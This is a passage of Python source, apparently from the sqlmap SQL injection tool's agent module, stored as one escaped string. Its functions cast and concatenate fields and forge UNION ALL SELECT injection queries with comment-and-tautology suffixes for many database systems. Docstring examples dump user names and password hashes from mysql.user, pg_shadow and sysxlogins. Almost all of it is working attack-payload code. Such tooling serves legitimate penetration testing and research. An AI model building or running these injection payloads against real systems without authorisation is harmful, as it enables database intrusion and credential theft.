\"'\")\n\n            for _ in set(re.findall(r\"\\[RANDNUM(?:\\d+)?\\]\", payload, re.I)):\n                payload = payload.replace(_, str(randomInt()))\n\n            for _ in set(re.findall(r\"\\[RANDSTR(?:\\d+)?\\]\", payload, re.I)):\n                payload = payload.replace(_, randomStr())\n\n            if hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) in (FORK.MEMSQL, FORK.TIDB, FORK.DRIZZLE):\n                payload = re.sub(r\"(?i)\\bORD\\(\", \"ASCII(\", payload)\n                payload = re.sub(r\"(?i)\\bMID\\(\", \"SUBSTR(\", payload)\n                payload = re.sub(r\"(?i)\\bNCHAR\\b\", \"CHAR\", payload)\n\n            # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5057\n            match = re.search(r\"(=0x)(303a303a)3(\\d{2,})\", payload)\n            if match:\n                payload = payload.replace(match.group(0), \"%s%s%s\" % (match.group(1), match.group(2).upper(), \"\".join(\"3%s\" % _ for _ in match.group(3))))\n\n        return payload\n\n    def getComment(self, request):\n        \"\"\"\n        Returns comment form for the given request\n        \"\"\"\n\n        return request.comment if \"comment\" in request else \"\"\n\n    def hexConvertField(self, field):\n        \"\"\"\n        Returns hex converted field string\n        \"\"\"\n\n        rootQuery = queries[Backend.getIdentifiedDbms()]\n        hexField = field\n\n        if \"hex\" in rootQuery and hasattr(rootQuery.hex, \"query\"):\n            hexField = rootQuery.hex.query % field\n        else:\n            warnMsg = \"switch '--hex' is currently not supported on DBMS '%s'\" % Backend.getIdentifiedDbms()\n            singleTimeWarnMessage(warnMsg)\n\n        return hexField\n\n    def nullAndCastField(self, field):\n        \"\"\"\n        Take in input a field string and return its processed nulled and\n        casted field string.\n\n        Examples:\n\n        MySQL input:  VERSION()\n        MySQL output: IFNULL(CAST(VERSION() AS CHAR(10000)), ' ')\n        MySQL scope:  VERSION()\n\n        PostgreSQL input:  VERSION()\n        PostgreSQL output: COALESCE(CAST(VERSION() AS CHARACTER(10000)), ' ')\n        PostgreSQL scope:  VERSION()\n\n        Oracle input:  banner\n        Oracle output: NVL(CAST(banner AS VARCHAR(4000)), ' ')\n        Oracle scope:  SELECT banner FROM v$version WHERE ROWNUM=1\n\n        Microsoft SQL Server input:  @@VERSION\n        Microsoft SQL Server output: ISNULL(CAST(@@VERSION AS VARCHAR(8000)), ' ')\n        Microsoft SQL Server scope:  @@VERSION\n\n        @param field: field string to be processed\n        @type field: C{str}\n\n        @return: field string nulled and casted\n        @rtype: C{str}\n        \"\"\"\n\n        match = re.search(r\"(?i)(.+)( AS \\w+)\\Z\", field)\n        if match:\n            field, suffix = match.groups()\n        else:\n            suffix = \"\"\n\n        nulledCastedField = field\n\n        if field and Backend.getIdentifiedDbms():\n            rootQuery = queries[Backend.getIdentifiedDbms()]\n\n            if field.startswith(\"(CASE\") or field.startswith(\"(IIF\") or conf.noCast:\n                nulledCastedField = field\n            else:\n                if not (Backend.isDbms(DBMS.SQLITE) and not isDBMSVersionAtLeast('3')):\n                    nulledCastedField = rootQuery.cast.query % field\n\n                if re.search(r\"COUNT\\(\", field) and Backend.getIdentifiedDbms() in (DBMS.RAIMA,):\n                    pass\n                elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI):\n                    nulledCastedField = rootQuery.isnull.query % (nulledCastedField, nulledCastedField)\n                else:\n                    nulledCastedField = rootQuery.isnull.query % nulledCastedField\n\n            kb.binaryField = conf.binaryFields and field in conf.binaryFields\n            if conf.hexConvert or kb.binaryField:\n                nulledCastedField = self.hexConvertField(nulledCastedField)\n\n        if suffix:\n            nulledCastedField += suffix\n\n        if not kb.nchar:\n            nulledCastedField = re.sub(r\"( AS )N(CHAR|VARCHAR)\", r\"\\g<1>\\g<2>\", nulledCastedField)\n\n        return nulledCastedField\n\n    def nullCastConcatFields(self, fields):\n        \"\"\"\n        Take in input a sequence of fields string and return its processed\n        nulled, casted and concatenated fields string.\n\n        Examples:\n\n        MySQL input:  user,password\n        MySQL output: IFNULL(CAST(user AS CHAR(10000)), ' '),'UWciUe',IFNULL(CAST(password AS CHAR(10000)), ' ')\n        MySQL scope:  SELECT user, password FROM mysql.user\n\n        PostgreSQL input:  usename,passwd\n        PostgreSQL output: COALESCE(CAST(usename AS CHARACTER(10000)), ' ')||'xRBcZW'||COALESCE(CAST(passwd AS CHARACTER(10000)), ' ')\n        PostgreSQL scope:  SELECT usename, passwd FROM pg_shadow\n\n        Oracle input:  COLUMN_NAME,DATA_TYPE\n        Oracle output: NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), ' ')||'UUlHUa'||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), ' ')\n        Oracle scope:  SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'\n\n        Microsoft SQL Server input:  name,master.dbo.fn_varbintohexstr(password)\n        Microsoft SQL Server output: ISNULL(CAST(name AS VARCHAR(8000)), ' ')+'nTBdow'+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), ' ')\n        Microsoft SQL Server scope:  SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins\n\n        @param fields: fields string to be processed\n        @type fields: C{str}\n\n        @return: fields string nulled, casted and concatened\n        @rtype: C{str}\n        \"\"\"\n\n        if not Backend.getIdentifiedDbms():\n            return fields\n\n        if fields.startswith(\"(CASE\") or fields.startswith(\"(IIF\") or fields.startswith(\"SUBSTR\") or fields.startswith(\"MID(\") or re.search(r\"\\A'[^']+'\\Z\", fields):\n            nulledCastedConcatFields = fields\n        else:\n            fieldsSplitted = splitFields(fields)\n            dbmsDelimiter = queries[Backend.getIdentifiedDbms()].delimiter.query\n            nulledCastedFields = []\n\n            for field in fieldsSplitted:\n                field = re.sub(r\"(?i) AS \\w+\\Z\", \"\", field)         # NOTE: fields such as \"... AS type_name\" have to be stripped from the alias part for this functionality to work\n                nulledCastedFields.append(self.nullAndCastField(field))\n\n            delimiterStr = \"%s'%s'%s\" % (dbmsDelimiter, kb.chars.delimiter, dbmsDelimiter)\n            nulledCastedConcatFields = delimiterStr.join(field for field in nulledCastedFields)\n\n        return nulledCastedConcatFields\n\n    def getFields(self, query):\n        \"\"\"\n        Take in input a query string and return its fields (columns) and\n        more details.\n\n        Example:\n\n        Input:  SELECT user, password FROM mysql.user\n        Output: user,password\n\n        @param query: query to be processed\n        @type query: C{str}\n\n        @return: query fields (columns) and more details\n        @rtype: C{str}\n        \"\"\"\n\n        prefixRegex = r\"(?:\\s+(?:FIRST|SKIP|LIMIT(?: \\d+)?)\\s+\\d+)*\"\n        fieldsSelectTop = re.search(r\"\\ASELECT\\s+TOP(\\s+[\\d]|\\s*\\([^)]+\\))\\s+(.+?)\\s+FROM\", query, re.I)\n        fieldsSelectRownum = re.search(r\"\\ASELECT\\s+([^()]+?),\\s*ROWNUM AS LIMIT FROM\", query, re.I)\n        fieldsSelectDistinct = re.search(r\"\\ASELECT%s\\s+DISTINCT\\((.+?)\\)\\s+FROM\" % prefixRegex, query, re.I)\n        fieldsSelectCase = re.search(r\"\\ASELECT%s\\s+(\\(CASE WHEN\\s+.+\\s+END\\))\" % prefixRegex, query, re.I)\n        fieldsSelectFrom = re.search(r\"\\ASELECT%s\\s+(.+?)\\s+FROM \" % prefixRegex, query, re.I)\n        fieldsExists = re.search(r\"EXISTS\\(([^)]*)\\)\\Z\", query, re.I)\n        fieldsSelect = re.search(r\"\\ASELECT%s\\s+(.*)\" % prefixRegex, query, re.I)\n        fieldsSubstr = re.search(r\"\\A(SUBSTR|MID\\()\", query, re.I)\n        fieldsMinMaxstr = re.search(r\"(?:MIN|MAX)\\(([^\\(\\)]+)\\)\", query, re.I)\n        fieldsNoSelect = query\n\n        _ = zeroDepthSearch(query, \" FROM \")\n        if not _:\n            fieldsSelectFrom = None\n\n        fieldsToCastStr = fieldsNoSelect\n\n        if fieldsSubstr:\n            fieldsToCastStr = query\n        elif fieldsMinMaxstr:\n            fieldsToCastStr = fieldsMinMaxstr.group(1)\n        elif fieldsExists:\n            if fieldsSelect:\n                fieldsToCastStr = fieldsSelect.group(1)\n        elif fieldsSelectTop:\n            fieldsToCastStr = fieldsSelectTop.group(2)\n        elif fieldsSelectRownum:\n            fieldsToCastStr = fieldsSelectRownum.group(1)\n        elif fieldsSelectDistinct:\n            if Backend.getDbms() in (DBMS.HSQLDB,):\n                fieldsToCastStr = fieldsNoSelect\n            else:\n                fieldsToCastStr = fieldsSelectDistinct.group(1)\n        elif fieldsSelectCase:\n            fieldsToCastStr = fieldsSelectCase.group(1)\n        elif fieldsSelectFrom:\n            fieldsToCastStr = query[:unArrayizeValue(_)] if _ else query\n            fieldsToCastStr = re.sub(r\"\\ASELECT%s\\s+\" % prefixRegex, \"\", fieldsToCastStr)\n        elif fieldsSelect:\n            fieldsToCastStr = fieldsSelect.group(1)\n\n        fieldsToCastStr = fieldsToCastStr or \"\"\n\n        # Function\n        if re.search(r\"\\A\\w+\\(.*\\)\", fieldsToCastStr, re.I) or (fieldsSelectCase and \"WHEN use\" not in query) or fieldsSubstr:\n            fieldsToCastList = [fieldsToCastStr]\n        else:\n            fieldsToCastList = splitFields(fieldsToCastStr)\n\n        return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, fieldsToCastList, fieldsToCastStr, fieldsExists\n\n    def simpleConcatenate(self, first, second):\n        rootQuery = queries[Backend.getIdentifiedDbms()]\n        return rootQuery.concatenate.query % (first, second)\n\n    def preprocessField(self, table, field):\n        \"\"\"\n        Does a field preprocessing (if needed) based on its type (e.g. image to text)\n        Note: used primarily in dumping of custom tables\n        \"\"\"\n\n        retVal = field\n        if conf.db and table and conf.db in table:\n            table = table.split(conf.db)[-1].strip('.')\n        try:\n            columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(table, True)]\n            for name, type_ in columns.items():\n                if type_ and type_.upper() in DUMP_DATA_PREPROCESS.get(Backend.getDbms(), {}) and name == field:\n                    retVal = DUMP_DATA_PREPROCESS[Backend.getDbms()][type_.upper()] % name\n                    break\n        except KeyError:\n            pass\n        return retVal\n\n    def concatQuery(self, query, unpack=True):\n        \"\"\"\n        Take in input a query string and return its processed nulled,\n        casted and concatenated query string.\n\n        Examples:\n\n        MySQL input:  SELECT user, password FROM mysql.user\n        MySQL output: CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user\n\n        PostgreSQL input:  SELECT usename, passwd FROM pg_shadow\n        PostgreSQL output: 'HsYIBS'||COALESCE(CAST(usename AS CHARACTER(10000)), ' ')||'KTBfZp'||COALESCE(CAST(passwd AS CHARACTER(10000)), ' ')||'LkhmuP' FROM pg_shadow\n\n        Oracle input:  SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='USERS'\n        Oracle output: 'GdBRAo'||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), ' ')||'czEHOf'||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), ' ')||'JVlYgS' FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='USERS'\n\n        Microsoft SQL Server input:  SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins\n        Microsoft SQL Server output: 'QQMQJO'+ISNULL(CAST(name AS VARCHAR(8000)), ' ')+'kAtlqH'+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), ' ')+'lpEqoi' FROM master..sysxlogins\n\n        @param query: query string to be processed\n        @type query: C{str}\n\n        @return: query string nulled, casted and concatenated\n        @rtype: C{str}\n        \"\"\"\n\n        if unpack:\n            concatenatedQuery = \"\"\n            query = query.replace(\", \", ',')\n            fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, _, fieldsToCastStr, fieldsExists = self.getFields(query)\n            castedFields = self.nullCastConcatFields(fieldsToCastStr)\n            concatenatedQuery = query.replace(fieldsToCastStr, castedFields, 1)\n        else:\n            return query\n\n        if Backend.isDbms(DBMS.MYSQL):\n            if fieldsExists:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"CONCAT('%s',\" % kb.chars.start, 1)\n                concatenatedQuery += \",'%s')\" % kb.chars.stop\n            elif fieldsSelectCase:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"CONCAT('%s',\" % kb.chars.start, 1)\n                concatenatedQuery += \",'%s')\" % kb.chars.stop\n            elif fieldsSelectFrom:\n                _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, \" FROM \"))\n                concatenatedQuery = \"%s,'%s')%s\" % (concatenatedQuery[:_].replace(\"SELECT \", \"CONCAT('%s',\" % kb.chars.start, 1), kb.chars.stop, concatenatedQuery[_:])\n            elif fieldsSelect:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"CONCAT('%s',\" % kb.chars.start, 1)\n                concatenatedQuery += \",'%s')\" % kb.chars.stop\n            elif fieldsNoSelect:\n                concatenatedQuery = \"CONCAT('%s',%s,'%s')\" % (kb.chars.start, concatenatedQuery, kb.chars.stop)\n\n        elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO):\n            if fieldsExists:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'||\" % kb.chars.start, 1)\n                concatenatedQuery += \"||'%s'\" % kb.chars.stop\n            elif fieldsSelectCase:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'||(SELECT \" % kb.chars.start, 1)\n                concatenatedQuery += \")||'%s'\" % kb.chars.stop\n            elif fieldsSelectFrom:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'||\" % kb.chars.start, 1)\n                _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, \" FROM \"))\n                concatenatedQuery = \"%s||'%s'%s\" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])\n                concatenatedQuery = re.sub(r\"('%s'\\|\\|)(.+?)(%s)\" % (kb.chars.start, re.escape(castedFields)), r\"\\g<2>\\g<1>\\g<3>\", concatenatedQuery)\n            elif fieldsSelect:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'||\" % kb.chars.start, 1)\n                concatenatedQuery += \"||'%s'\" % kb.chars.stop\n            elif fieldsNoSelect:\n                concatenatedQuery = \"'%s'||%s||'%s'\" % (kb.chars.start, concatenatedQuery, kb.chars.stop)\n\n        elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):\n            if fieldsExists:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'+\" % kb.chars.start, 1)\n                concatenatedQuery += \"+'%s'\" % kb.chars.stop\n            elif fieldsSelectTop:\n                topNum = re.search(r\"\\ASELECT\\s+TOP(\\s+[\\d]|\\s*\\([^)]+\\))\\s+\", concatenatedQuery, re.I).group(1)\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT TOP%s \" % topNum, \"TOP%s '%s'+\" % (topNum, kb.chars.start), 1)\n                concatenatedQuery = concatenatedQuery.replace(\" FROM \", \"+'%s' FROM \" % kb.chars.stop, 1)\n            elif fieldsSelectCase:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'+\" % kb.chars.start, 1)\n                concatenatedQuery += \"+'%s'\" % kb.chars.stop\n            elif fieldsSelectFrom:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'+\" % kb.chars.start, 1)\n                _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, \" FROM \"))\n                concatenatedQuery = \"%s+'%s'%s\" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])\n            elif fieldsSelect:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'+\" % kb.chars.start, 1)\n                concatenatedQuery += \"+'%s'\" % kb.chars.stop\n            elif fieldsNoSelect:\n                concatenatedQuery = \"'%s'+%s+'%s'\" % (kb.chars.start, concatenatedQuery, kb.chars.stop)\n\n        elif Backend.isDbms(DBMS.ACCESS):\n            if fieldsExists:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'&\" % kb.chars.start, 1)\n                concatenatedQuery += \"&'%s'\" % kb.chars.stop\n            elif fieldsSelectCase:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'&(SELECT \" % kb.chars.start, 1)\n                concatenatedQuery += \")&'%s'\" % kb.chars.stop\n            elif fieldsSelectFrom:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'&\" % kb.chars.start, 1)\n                _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, \" FROM \"))\n                concatenatedQuery = \"%s&'%s'%s\" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])\n            elif fieldsSelect:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"'%s'&\" % kb.chars.start, 1)\n                concatenatedQuery += \"&'%s'\" % kb.chars.stop\n            elif fieldsNoSelect:\n                concatenatedQuery = \"'%s'&%s&'%s'\" % (kb.chars.start, concatenatedQuery, kb.chars.stop)\n\n        else:\n            warnMsg = \"applying generic concatenation (CONCAT)\"\n            singleTimeWarnMessage(warnMsg)\n\n            if FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms()):\n                _ = re.sub(r\"(?i)%s\\Z\" % re.escape(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]), \"\", concatenatedQuery)\n                if _ != concatenatedQuery:\n                    concatenatedQuery = _\n                    fieldsSelectFrom = None\n\n            if fieldsExists:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"CONCAT(CONCAT('%s',\" % kb.chars.start, 1)\n                concatenatedQuery += \"),'%s')\" % kb.chars.stop\n            elif fieldsSelectCase:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"CONCAT(CONCAT('%s',\" % kb.chars.start, 1)\n                concatenatedQuery += \"),'%s')\" % kb.chars.stop\n            elif fieldsSelectFrom or fieldsSelect:\n                fromTable = \"\"\n\n                _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, \" FROM \"))\n                if _:\n                    concatenatedQuery, fromTable = concatenatedQuery[:_], concatenatedQuery[_:]\n\n                concatenatedQuery = re.sub(r\"(?i)\\ASELECT \", \"\", concatenatedQuery)\n                replacement = \"'%s',%s,'%s'\" % (kb.chars.start, concatenatedQuery, kb.chars.stop)\n                chars = [_ for _ in replacement]\n\n                count = 0\n                for index in zeroDepthSearch(replacement, ',')[1:]:\n                    chars[index] = \"),\"\n                    count += 1\n\n                replacement = \"CONCAT(%s%s)\" % (\"CONCAT(\" * count, \"\".join(chars))\n                concatenatedQuery = \"%s%s\" % (replacement, fromTable)\n            elif fieldsSelect:\n                concatenatedQuery = concatenatedQuery.replace(\"SELECT \", \"CONCAT(CONCAT('%s',\" % kb.chars.start, 1)\n                concatenatedQuery += \"),'%s')\" % kb.chars.stop\n            elif fieldsNoSelect:\n                concatenatedQuery = \"CONCAT(CONCAT('%s',%s),'%s')\" % (kb.chars.start, concatenatedQuery, kb.chars.stop)\n\n        return concatenatedQuery\n\n    def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):\n        \"\"\"\n        Take in input an query (pseudo query) string and return its\n        processed UNION ALL SELECT query.\n\n        Examples:\n\n        MySQL input:  CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user\n        MySQL output:  UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488\n\n        PostgreSQL input:  (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow\n        PostgreSQL output:  UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713\n\n        Oracle input:  (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))\n        Oracle output:  UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738\n\n        Microsoft SQL Server input:  (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins\n        Microsoft SQL Server output:  UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254\n\n        @param query: it is a processed query string unescaped to be\n        forged within an UNION ALL SELECT statement\n        @type query: C{str}\n\n        @param position: it is the NULL position where it is possible\n        to inject the query\n        @type position: C{int}\n\n        @return: UNION ALL SELECT query string forged\n        @rtype: C{str}\n        \"\"\"\n\n        if conf.uFrom:\n            fromTable = \" FROM %s\" % conf.uFrom\n        elif not fromTable:\n            if kb.tableFrom:\n                fromTable = \" FROM %s\" % kb.tableFrom\n            else:\n                fromTable = FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), \"\")\n\n        if query.startswith(\"SELECT \"):\n            query = query[len(\"SELECT \"):]\n\n        unionQuery = self.prefixQuery(\"UNION ALL SELECT \", prefix=prefix)\n\n        if limited:\n            unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))\n            unionQuery += fromTable\n            unionQuery = self.suffixQuery(unionQuery, comment, suffix)\n\n            return unionQuery\n        else:\n            _ = zeroDepthSearch(query, \" FROM \")\n            if _:\n                fromTable = query[_[0]:]\n\n            if fromTable and query.endswith(fromTable):\n                query = query[:-len(fromTable)]\n\n        topNumRegex = re.search(r\"\\ATOP\\s+([\\d]+)\\s+\", query, re.I)\n        if topNumRegex:\n            topNum = topNumRegex.group(1)\n            query = query[len(\"TOP %s \" % topNum):]\n            unionQuery += \"TOP %s \" % topNum\n\n        intoRegExp = re.search(r\"(\\s+INTO (DUMP|OUT)FILE\\s+'(.+?)')\", query, re.I)\n\n        if intoRegExp:\n            intoRegExp = intoRegExp.group(1)\n            query = query[:query.index(intoRegExp)]\n\n            position = 0\n            char = NULL\n\n        for element in xrange(0, count):\n            if element > 0:\n                unionQuery += ','\n\n            if element == position:\n                unionQuery += query\n            else:\n                unionQuery += char\n\n        if fromTable and not unionQuery.endswith(fromTable):\n            unionQuery += fromTable\n\n        if intoRegExp:\n            unionQuery += intoRegExp\n\n        if multipleUnions:\n            unionQuery += \" UNION ALL SELECT \"\n\n            for element in xrange(count):\n                if element > 0:\n                    unionQuery += ','\n\n                if element == position:\n                    unionQuery += multipleUnions\n                else:\n                    unionQuery += char\n\n            if fromTable:\n                unionQuery += fromTable\n\n        unionQuery = self.suffixQuery(unionQuery, comment, suffix)\n\n        return unionQuery\n\n    def limitCondition(self, expression, dump=False):\n        startLimit = 0\n        stopLimit = None\n        limitCond = True\n\n        topLimit = re.search(r\"TOP\\s+([\\d]+)\\s+\", expression, re.I)\n\n        limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)\n\n        if hasattr(queries[Backend.getIdentifiedDbms()].limitregexp, \"query2\"):\n            limitRegExp2 = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query2, expression, re.I)\n        else:\n            limitRegExp2 = None\n\n        if (limitRegExp or limitRegExp2) or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):\n            if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2):\n                limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query\n                limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query\n\n                if limitGroupStart.isdigit():\n                    if limitRegExp:\n                        startLimit = int(limitRegExp.group(int(limitGroupStart)))\n                        stopLimit = limitRegExp.group(int(limitGroupStop))\n                    elif limitRegExp2:\n                        startLimit = 0\n                        stopLimit = limitRegExp2.group(int(limitGroupStart))\n                limitCond = int(stopLimit) > 1\n\n            elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):\n                if limitRegExp:\n                    limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query\n                    limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query\n\n                    if limitGroupStart.isdigit():\n                        startLimit = int(limitRegExp.group(int(limitGroupStart)))\n\n                    stopLimit = limitRegExp.group(int(limitGroupStop))\n                    limitCond = int(stopLimit) > 1\n                elif topLimit:\n                    startLimit = 0\n                    stopLimit = int(topLimit.group(1))\n                    limitCond = int(stopLimit) > 1\n\n            elif Backend.isDbms(DBMS.ORACLE):\n                limitCond = False\n\n        # We assume that only queries NOT containing a \"LIMIT #, 1\"\n        # (or equivalent depending on the back-end DBMS) can return\n        # multiple entries\n        if limitCond:\n            if (limitRegExp or limitRegExp2) and stopLimit is not None:\n                stopLimit = int(stopLimit)\n\n                # From now on we need only the expression until the \" LIMIT \"\n                # (or equivalent, depending on the back-end DBMS) word\n                if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):\n                    stopLimit += startLimit\n                    if expression.find(queries[Backend.getIdentifiedDbms()].limitstring.query) > 0:\n                        _ = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)\n                    else:\n                        _ = re.search(r\"\\bLIMIT\\b\", expression, re.I).start()\n                    expression = expression[:_]\n\n                elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):\n                    stopLimit += startLimit\n            elif dump:\n                if conf.limitStart:\n                    startLimit = conf.limitStart - 1\n                if conf.limitStop:\n                    stopLimit = conf.limitStop\n\n        return expression, limitCond, topLimit, startLimit, stopLimit\n\n    def limitQuery(self, num, query, field=None, uniqueField=None):\n        \"\"\"\n        Take in input a query string and return its limited query string.\n\n        Example:\n\n        Input:  SELECT user FROM mysql.users\n        Output: SELECT user FROM mysql.users LIMIT <num>, 1\n\n        @param num: limit number\n        @type num: C{int}\n\n        @param query: query to be processed\n        @type query: C{str}\n\n        @param field: field within the query\n        @type field: C{list}\n\n        @return: limited query string\n        @rtype: C{str}\n        \"\"\"\n\n        if \" FROM \" not in query:\n            return query\n\n        limitedQuery = query\n        limitStr = queries[Backend.getIdentifiedDbms()].limit.query\n        fromIndex = limitedQuery.index(\" FROM \")\n        untilFrom = limitedQuery[:fromIndex]\n        fromFrom = limitedQuery[fromIndex + 1:]\n        orderBy = None\n\n        if 